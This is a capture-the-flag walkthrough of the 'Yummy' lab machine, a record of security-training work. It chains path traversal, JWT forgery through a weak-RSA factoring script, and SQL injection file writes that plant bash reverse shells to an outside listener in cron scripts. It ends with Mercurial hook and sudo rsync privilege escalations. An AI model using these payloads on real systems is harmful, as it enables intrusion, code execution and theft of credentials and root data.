Yummy (Hard)

Hard difficulty Linux box.....


Enumeration

As usual we will start with a simple nmap scan:
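(The exact command isn't shown in the writeup; a scan roughly like the one below — flags assumed from the version, script, and reason output — would produce it.)

nmap -sC -sV --reason 10.10.11.36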

Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 a2:ed:65:77:e9:c4:2f:13:49:19:b0:b8:09:eb:56:36 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNb9gG2HwsjMe4EUwFdFE9H8NguzJkfCboW4CveSS+cr2846RitFyzx3a9t4X7S3xE3OgLnmgj8PtKCcOnVh8nQ=
|   256 bc:df:25:35:5c:97:24:f2:69:b4:ce:60:17:50:3c:f0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEZKWYurAF2kFS4bHCSCBvsQ+55/NxhAtZGCykcOx9b6
80/tcp open  http    syn-ack ttl 63 Caddy httpd
|_http-title: Did not follow redirect to http://yummy.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Caddy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We will add "yummy.htb" to our /etc/hosts file and then check the website.
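For example:

echo "10.10.11.36 yummy.htb" | sudo tee -a /etc/hosts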

After making an account and logging in, we see we can reserve a table:

After filling in the data and visiting the dashboard, we see we can save an iCalendar reminder of our reservation. Saving it makes two requests: 1) first to /reminder/<NUMBER>, which prepares the file for download; 2) then to /export/<FILE>, which downloads it.

Now let's try manipulating the file name in the "export" route to see if we can get LFI:

We get a 500 error because the prepared .ics file has already been exported; to retry, we have to send the reminder request and then the export request, EACH time.

Reading Files Using LFI

After sending the reminder request again, we retry the export:
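A request roughly like the following works (the exact traversal depth and the session cookie name are assumptions; remember to hit /reminder/<NUMBER> first each time):

curl --path-as-is -b "session=<our JWT>" "http://yummy.htb/export/../../../../etc/passwd"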

After enumerating for useful files, we find that /etc/crontab references some interesting scripts:

52 6	1 * *	root	test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
#
*/1 * * * * www-data /bin/bash /data/scripts/app_backup.sh
*/15 * * * * mysql /bin/bash /data/scripts/table_cleanup.sh
* * * * * mysql /bin/bash /data/scripts/dbmonitor.sh

Let's see if we can read any of those, starting with "table_cleanup.sh":

#!/bin/sh

/usr/bin/mysql -h localhost -u chef yummy_db -p'3wDo7gSRZIwIHRxZ!' < /data/scripts/sqlappointments.sql

This gives us the MySQL password, but we can't do much with it since MySQL isn't exposed externally. Let's check "dbmonitor.sh":

#!/bin/bash

timestamp=$(/usr/bin/date)
service=mysql
response=$(/usr/bin/systemctl is-active mysql)

if [ "$response" != 'active' ]; then
    /usr/bin/echo "{\"status\": \"The database is down\", \"time\": \"$timestamp\"}" > /data/scripts/dbstatus.json
    /usr/bin/echo "$service is down, restarting!!!" | /usr/bin/mail -s "$service is down!!!" root
    latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
    /bin/bash "$latest_version"
else
    if [ -f /data/scripts/dbstatus.json ]; then
        if grep -q "database is down" /data/scripts/dbstatus.json 2>/dev/null; then
            /usr/bin/echo "The database was down at $timestamp. Sending notification."
            /usr/bin/echo "$service was down at $timestamp but came back up." | /usr/bin/mail -s "$service was down!" root
            /usr/bin/rm -f /data/scripts/dbstatus.json
        else
            /usr/bin/rm -f /data/scripts/dbstatus.json
            /usr/bin/echo "The automation failed in some way, attempting to fix it."
            latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
            /bin/bash "$latest_version"
        fi
    else
        /usr/bin/echo "Response is OK."
    fi
fi

[ -f dbstatus.json ] && /usr/bin/rm -f dbstatus.json

This script monitors the state of the database: it records when the database was down, sends notifications to the root user, and attempts some automated fixes. Let's check the third script, "app_backup.sh":

#!/bin/bash

cd /var/www
/usr/bin/rm backupapp.zip
/usr/bin/zip -r backupapp.zip /opt/app

It creates a zip archive of the running web application and stores it at "/var/www/backupapp.zip". We can read this file using the same LFI; since it's binary, we simply use Burp Suite to download it directly and then extract it.
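Outside of Burp, something roughly like this would also work (same assumptions about traversal depth and cookie name as before):

curl --path-as-is -b "session=<our JWT>" -o backupapp.zip "http://yummy.htb/export/../../../../var/www/backupapp.zip"
unzip backupapp.zip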

find opt/ -maxdepth 3
opt/
opt/app
opt/app/middleware
opt/app/middleware/verification.py
opt/app/middleware/__pycache__
opt/app/app.py
opt/app/config
opt/app/config/signature.py
opt/app/config/__pycache__
opt/app/templates
opt/app/templates/register.html
opt/app/templates/login.html
opt/app/templates/index.html
opt/app/templates/admindashboard.html
opt/app/templates/dashboard.html
<SNIP>

Administrator Access

Now we have the application's source code, and two things stand out: 1) in app.py there is an "admindashboard" route that checks for the administrator role in the JWT; 2) in signature.py we can see how the tokens are generated and signed:

#!/usr/bin/python3

from Crypto.PublicKey import RSA
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import sympy


# Generate RSA key pair
q = sympy.randprime(2**19, 2**20)
n = sympy.randprime(2**1023, 2**1024) * q
e = 65537
p = n // q
phi_n = (p - 1) * (q - 1)
d = pow(e, -1, phi_n)
key_data = {'n': n, 'e': e, 'd': d, 'p': p, 'q': q}
key = RSA.construct((key_data['n'], key_data['e'], key_data['d'], key_data['p'], key_data['q']))
private_key_bytes = key.export_key()

private_key = serialization.load_pem_private_key(
    private_key_bytes,
    password=None,
    backend=default_backend()
)
public_key = private_key.public_key()

It's basic RSA signing, but q is sampled from a tiny range (2^19 to 2^20), so the modulus n is trivial to factor. The plan: take a valid token, extract the public modulus n from it, factor it to recover p and q, derive the private exponent d, and then sign our own token with the role set to administrator.

Using ChatGPT and some reading of the original signature.py code, we put together the following script to forge our own token:

import base64
import json
import jwt
import sympy
from Crypto.PublicKey import RSA
from cryptography.hazmat.primitives import serialization

# Given JWT token
token = "TOKEN HERE"

# Decode JWT Payload
payload = base64.urlsafe_b64decode(token.split(".")[1] + "===").decode()
claims = json.loads(payload)

# Extract & Rebuild RSA Private Key
n = int(claims["jwk"]['n'])  
e = 65537  
p, q = list(sympy.factorint(n).keys())
  
phi_n = (p - 1) * (q - 1)
d = pow(e, -1, phi_n)

# Construct Private Key
key = RSA.construct((n, e, d, p, q))
private_key_bytes = key.export_key()

# Load private key for signing
private_key = serialization.load_pem_private_key(
    private_key_bytes,
    password=None
)

# Decoding the original token
public_key = private_key.public_key()
data = jwt.decode(token, public_key, algorithms=["RS256"])

data['role'] = "administrator"
new_token = jwt.encode(data, private_key, algorithm="RS256")

print("New JWT Token:", new_token)
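Install the dependencies and run it (the script name here is just an example), then replace the JWT the application gave us — e.g., the session cookie — with the forged one:

pip3 install 'pyjwt[crypto]' pycryptodome sympy
python3 forge_admin_token.py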

After running the script and using the output JWT, we now have access to the admin dashboard:

SQL Injection and Shell as mysql

Using the "search" function on the admin dashboard, we see it sends a GET request like http://yummy.htb/admindashboard?s=&o=ASC. Remember that we have the application's source code, and it contains an SQL injection in the way the "o" (order) parameter is handled:

                # added option to order the reservations
                order_query = request.args.get('o', '')

                sql = f"SELECT * FROM appointments WHERE appointment_email LIKE %s order by appointment_date {order_query}"
                cursor.execute(sql, ('%' + search_query + '%',))
                connection.commit()
                appointments = cursor.fetchall()
            connection.close()
<SNIP>

Sending a single quote in the "o" parameter produces a MySQL error:
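For example, with a request like this (the resulting error screenshot isn't reproduced here):

http://yummy.htb/admindashboard?s=a&o=ASC'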

We could run sqlmap on it and dump the database, but that turned out to be useless, so we need another approach. Testing whether we can write files succeeded, since no error message was shown:

http://yummy.htb/admindashboard?s=a&o=ASC;SELECT+%27VAMPIRE%27+INTO+OUTFILE+%27/tmp/vamp%27

Not seeing an error means we can write files as the mysql user (stacked queries work here because the application connects with CLIENT.MULTI_STATEMENTS). We already have file read through the LFI, so we need to leverage this file write. Looking back at the cron jobs from earlier, there is an interesting action in "dbmonitor.sh":

    if [ -f /data/scripts/dbstatus.json ]; then
        if grep -q "database is down" /data/scripts/dbstatus.json 2>/dev/null; then
            /usr/bin/echo "The database was down at $timestamp. Sending notification."
            /usr/bin/echo "$service was down at $timestamp but came back up." | /usr/bin/mail -s "$service was down!" root
            /usr/bin/rm -f /data/scripts/dbstatus.json
        else
            /usr/bin/rm -f /data/scripts/dbstatus.json
            /usr/bin/echo "The automation failed in some way, attempting to fix it."
            latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
            /bin/bash "$latest_version"

Here, the script checks for the "dbstatus.json" file. If it exists and its contents do not say the database is down, the script executes the latest "fixer-v*" file. Notice the wildcard: since we have file write access, we can drop any script there named, for example, "fixer-vv", and it will be executed.

First we write the "dbstatus.json" file so that it exists but does NOT say the database is down, then we write a bash reverse shell as the fixer script:

http://yummy.htb/admindashboard?s=a&o=ASC;SELECT+'VAMPIRE'+INTO+OUTFILE+'/data/scripts/dbstatus.json'

http://yummy.htb/admindashboard?s=a&o=ASC;SELECT+%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.34%2F9001%200%3E%261%27+INTO+OUTFILE+%27/data/scripts/fixer-vv%27

After sending these two requests and checking our listener, we get a shell back!

nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.11.36] 46742
bash: cannot set terminal process group (30024): Inappropriate ioctl for device
bash: no job control in this shell
mysql@yummy:/var/spool/cron$ id
id
uid=110(mysql) gid=110(mysql) groups=110(mysql)

Shell as www-data Then User

Enumerating the system, we notice that one of the cron jobs, the backup script, runs as "www-data" rather than "mysql":

*/1 * * * * www-data /bin/bash /data/scripts/app_backup.sh

Checking the permissions of the "scripts" directory, it is world-writable, so we can simply add a reverse shell line like "bash -i >& /dev/tcp/10.10.14.34/9001 0>&1" to app_backup.sh.
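From the mysql shell, something like this works (appending rather than replacing the script is an assumption; it also assumes the file itself is writable, or can be recreated since the directory is world-writable):

echo 'bash -i >& /dev/tcp/10.10.14.34/9001 0>&1' >> /data/scripts/app_backup.sh

On the next cron run, we get another shell: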

nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.11.36] 47314
bash: cannot set terminal process group (30357): Inappropriate ioctl for device
bash: no job control in this shell
www-data@yummy:/root$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

In "/var/www" there is an application called "app-qatesting", which is the running application. It is a repository, but managed with Mercurial (hg), a version control system similar to git. Let's look at the change log:

www-data@yummy:~/app-qatesting$ hg log
changeset:   9:f3787cac6111
tag:         tip
user:        qa
date:        Tue May 28 10:37:16 2024 -0400
summary:     attempt at patching path traversal

changeset:   8:0bbf8464d2d2
user:        qa
date:        Tue May 28 10:34:38 2024 -0400
summary:     removed comments

changeset:   7:2ec0ee295b83
user:        qa
date:        Tue May 28 10:32:50 2024 -0400
summary:     patched SQL injection vuln

changeset:   6:f87bdc6c94a8
user:        qa
date:        Tue May 28 10:27:32 2024 -0400
summary:     patched signature vuln
<SNIP>

Reviewing the interesting commits, the 8th one ("removed comments") contains credentials for the "qa" user:

www-data@yummy:~/app-qatesting$ hg diff -c 8
diff -r 2ec0ee295b83 -r 0bbf8464d2d2 app.py
--- a/app.py    Tue May 28 10:32:50 2024 -0400
+++ b/app.py    Tue May 28 10:34:38 2024 -0400
@@ -19,8 +19,8 @@

 db_config = {
     'host': '127.0.0.1',
-    'user': 'chef',
-    'password': '3wDo7gSRZIwIHRxZ!',
+    'user': 'qa',
+    'password': 'jPAd!XQCtn8Oc@2B',
     'database': 'yummy_db',
     'cursorclass': pymysql.cursors.DictCursor,
     'client_flag': CLIENT.MULTI_STATEMENTS
@@ -254,17 +254,13 @@
<SNIP>
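With this password we can log in as qa, e.g. over SSH (port 22 is open; password authentication is assumed to be allowed), or via su from the current shell:

ssh qa@yummy.htb    # password: jPAd!XQCtn8Oc@2B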

And we finally have a user!

qa@yummy:~$ wc -c user.txt
33 user.txt

Shell as dev

Checking the sudo rules for "qa":

qa@yummy:~$ sudo -l
Matching Defaults entries for qa on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User qa may run the following commands on localhost:
    (dev : dev) /usr/bin/hg pull /home/dev/app-production/

Since hg is a version control system, a bit of searching shows that it supports hooks, similar to git hooks, which can execute system commands. This means we can get a shell as dev if we edit the repository's "hgrc" file.

First we create a directory in "/tmp" called "acaard" and initialize a repository in it. We HAVE to make this directory world-writable because the "dev" user will need to write into it during the pull:

qa@yummy:/tmp$ mkdir acaard
qa@yummy:/tmp$ cd acaard/
qa@yummy:/tmp/acaard$ hg init
qa@yummy:/tmp$ chmod -R 777 acaard/

Then in ".hg/hgrc" we add:

[hooks]
changegroup = /tmp/vamp.sh

This "vamp.sh" file just contains a one-liner bash reverse shell; a sketch of creating it is shown below.
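The original one-liner isn't shown, so the payload below is an assumption (IP and port match our earlier listener):

cat > /tmp/vamp.sh << 'EOF'
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.34/9001 0>&1
EOF
chmod +x /tmp/vamp.sh

With the hook and payload in place, we run the "hg pull" command as dev and check our listener: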

qa@yummy:/tmp/acaard$ sudo -u dev /usr/bin/hg pull /home/dev/app-production/
nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.11.36] 54078
I'm out of office until February 24th, don't call me
dev@yummy:/tmp/acaard$ id
id
uid=1000(dev) gid=1000(dev) groups=1000(dev)

Root

As usual, starting with "sudo -l", we see we can back up files from our home directory using "rsync":

dev@yummy:~$ sudo -l
Matching Defaults entries for dev on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User dev may run the following commands on localhost:
    (root : root) NOPASSWD: /usr/bin/rsync -a --exclude\=.hg /home/dev/app-production/* /opt/app/

The sudo rule contains a wildcard, so anything after the fixed prefix is accepted: we can traverse out of /home/dev/app-production to back up whatever we want, AND we can append extra rsync options. My approach was to back up the "/root" directory to read the flag and SSH keys, adding an option to make the copy world-readable:

dev@yummy:~$ sudo /usr/bin/rsync -a --exclude=\.hg /home/dev/app-production/../../../root --chmod=777 /opt/app/
dev@yummy:~$ cat /opt/app/root/root.txt
0edacc5<SNIP>
dev@yummy:~$ ls /opt/app/root/.ssh
authorized_keys  id_rsa  id_rsa.pub


Happy hacking :)
